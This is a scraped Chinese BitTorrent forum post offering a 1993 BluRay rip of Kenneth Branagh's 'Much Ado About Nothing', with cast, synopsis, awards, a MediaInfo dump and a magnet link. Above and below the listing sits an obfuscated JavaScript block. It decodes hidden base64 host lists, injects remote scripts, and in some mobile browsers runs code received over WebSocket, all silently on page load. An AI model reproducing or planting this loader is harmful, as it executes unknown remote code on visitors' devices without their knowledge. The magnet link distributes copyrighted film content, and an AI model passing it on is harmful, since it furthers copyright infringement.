无事生非[国英多音轨/简繁字幕].Much.Ado.About.Nothing.1993.BluRay.1080p.2Audio.DTS-HD.MA2.0.x265.10bit 11.45GB

版主小s 1月前 226

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 无事生非 / 都是男人惹的祸 / 抢得有情郎

◎片 名 Much Ado About Nothing

◎年 代 1993

◎产 地 英国 / 美国

◎类 别 剧情 / 喜剧 / 爱情

◎语 言 英语

◎上映日期 1993-05-06(纽约首映)

◎IMDb链接 https://www.imdb.com/title/tt0107616/

◎豆瓣评分 7.4/10 (2687人评价)

◎豆瓣链接 https://movie.douban.com/subject/1296091/

◎片 长 111分钟

◎导 演 肯尼思·布拉纳 Kenneth Branagh (id:1036342)

◎编 剧 肯尼思·布拉纳 Kenneth Branagh (id:1036342)

威廉·莎士比亚 William Shakespeare (id:1044735)

◎演 员 肯尼思·布拉纳 Kenneth Branagh (id:1036342)

艾玛·汤普森 Emma Thompson (id:1054514)

理查德·布赖尔斯 Richard Briers (id:1014070)

丹泽尔·华盛顿 Denzel Washington (id:1054431)

凯特·贝金赛尔 Kate Beckinsale (id:1003487)

艾美达·斯丹顿 Imelda Staunton (id:1013856)

基努·里维斯 Keanu Reeves (id:1008070)

迈克尔·基顿 Michael Keaton (id:1049486)

罗伯特·肖恩·莱纳德 Robert Sean Leonard (id:1031873)

布耐恩·布莱塞得 Brian Blessed (id:1027900)

菲丽达·劳 Phyllida Law (id:1048232)

理查德·克里弗特 Richard Clifford (id:1329032)

大卫·帕菲特 David Parfitt (id:1293953)

斯蒂芬·伊万斯 Stephen Evans (id:1283360)

肯尼思·布拉纳 Kenneth Branagh (id:1036342)

帕特里克·道尔 Patrick Doyle (id:1000556)

安德鲁·马库斯 Andrew Marcus (id:1290965)

Pam Dixon Pam Dixon (id:1282494)

菲利斯·达尔顿 Phyllis Dalton (id:1281746)

Suzanne Stokes-Munton Suzanne Stokes-Munton (id:1298477)

安德鲁·马库斯 Andrew Marcus (id:1290965)

◎标 签 英国 / 喜剧 / Shakespeare / 名著改编 / 爱情 / EmmaThompson / KeanuReeves / 英国电影

◎简 介

王子的到来让莱奥纳多(理查德·布赖尔斯 Richard Briers 饰)的庄园熠熠生辉,王子的亲信克拉迪奥(罗伯特·肖恩·莱纳德 Robert Sean Leonard 饰)爱上了莱奥纳多的女儿希洛(凯特·贝金赛尔 Kate Beckinsale 饰),在王子的帮助下,两人互相吐露的心迹,两人的婚礼也提上了日程。

对王子一直心怀芥蒂的弟弟约翰(基努·李维斯 Keanu Reeves 饰)企图毁掉这幸福美满的一幕,他将克拉迪奥带到希洛房间的窗前,又命自己的部下和希洛的侍女在房中大行苟且之事。克拉迪奥将侍女误认为奚洛,悲伤有愤怒,在婚礼上,他大声斥责希洛的不忠,约翰的阴谋得逞了。然而,纸包不住火,当约翰的诡计被识破后,克拉迪奥能否和希洛重拾前缘呢?

◎获奖情况 (共3项)

第46届戛纳电影节 (1993)

主竞赛单元 金棕榈奖(提名)

└──肯尼思·布拉纳 (id:1036342)

第51届金球奖 (1994)

电影类 最佳音乐/喜剧片(提名)

第47届英国电影学院奖 (1994)

电影奖 最佳服装设计(提名)

└──菲利斯·达尔顿 (id:1281746)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 318990592562435851163128966952248577705 (0xEFFB5A79B150F616DF7EBDA706168EA9)

  4. Complete name : Much.Ado.About[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 11.4 GiB

  8. Duration : 1 h 50 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 14.8 Mb/s

  11. Encoded date : UTC 2021-10-20 02:50:13

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 50 min

  21. Bit rate : 13.0 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 040 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.271

  31. Stream size : 10.1 GiB (88%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 12975 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / total-frames=159633 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 50 min

  49. Bit rate mode : Variable

  50. Bit rate : 1 493 kb/s

  51. Channel(s) : 2 channels

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 1.16 GiB (10%)

  57. Title : English DTS-HD Master Audio 2.0 @ 1493 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 50 min

  68. Bit rate mode : Constant

  69. Bit rate : 192 kb/s

  70. Channel(s) : 2 channels

  71. Channel layout : L R

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 152 MiB (1%)

  76. Title : Mandarin Dolby Digital Audio? 2.0 @ 192 kbps

  77. Language : Chinese

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Text #1

  82. ID : 4

  83. Format : PGS

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 46 min

  87. Bit rate : 44.2 kb/s

  88. Count of elements : 2728

  89. Stream size : 33.8 MiB (0%)

  90. Title : Eng/SUP

  91. Language : English

  92. Default : No

  93. Forced : No


  94. Text #2

  95. ID : 5

  96. Format : PGS

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 47 min

  100. Bit rate : 33.8 kb/s

  101. Count of elements : 2978

  102. Stream size : 25.9 MiB (0%)

  103. Title : Chs/SUP 简体

  104. Language : Chinese

  105. Default : Yes

  106. Forced : No


  107. Text #3

  108. ID : 6

  109. Format : PGS

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 47 min

  113. Bit rate : 32.7 kb/s

  114. Count of elements : 2978

  115. Stream size : 25.1 MiB (0%)

  116. Title : Cht/SUP 繁体

  117. Language : Chinese

  118. Default : No

  119. Forced : No


  120. Menu

  121. 00:00:00.000 : en:第 01 章

  122. 00:09:32.989 : en:第 02 章

  123. 00:15:44.235 : en:第 03 章

  124. 00:17:23.000 : en:第 04 章

  125. 00:20:04.286 : en:第 05 章

  126. 00:27:50.252 : en:第 06 章

  127. 00:36:17.384 : en:第 07 章

  128. 00:48:01.253 : en:第 08 章

  129. 00:51:17.366 : en:第 09 章

  130. 00:54:42.112 : en:第 10 章

  131. 00:59:45.582 : en:第 11 章

  132. 01:09:19.030 : en:第 12 章

  133. 01:13:46.172 : en:第 13 章

  134. 01:17:49.832 : en:第 14 章

  135. 01:22:07.172 : en:第 15 章

  136. 01:28:44.819 : en:第 16 章

  137. 01:31:53.842 : en:第 17 章

  138. 01:36:04.133 : en:第 18 章

  139. 01:40:28.022 : en:第 19 章

  140. 01:44:13.914 : en:第 20 章




复制代码


TAGS 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:DB2EA5940FA02527B9645E502472150E36D8BAD3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};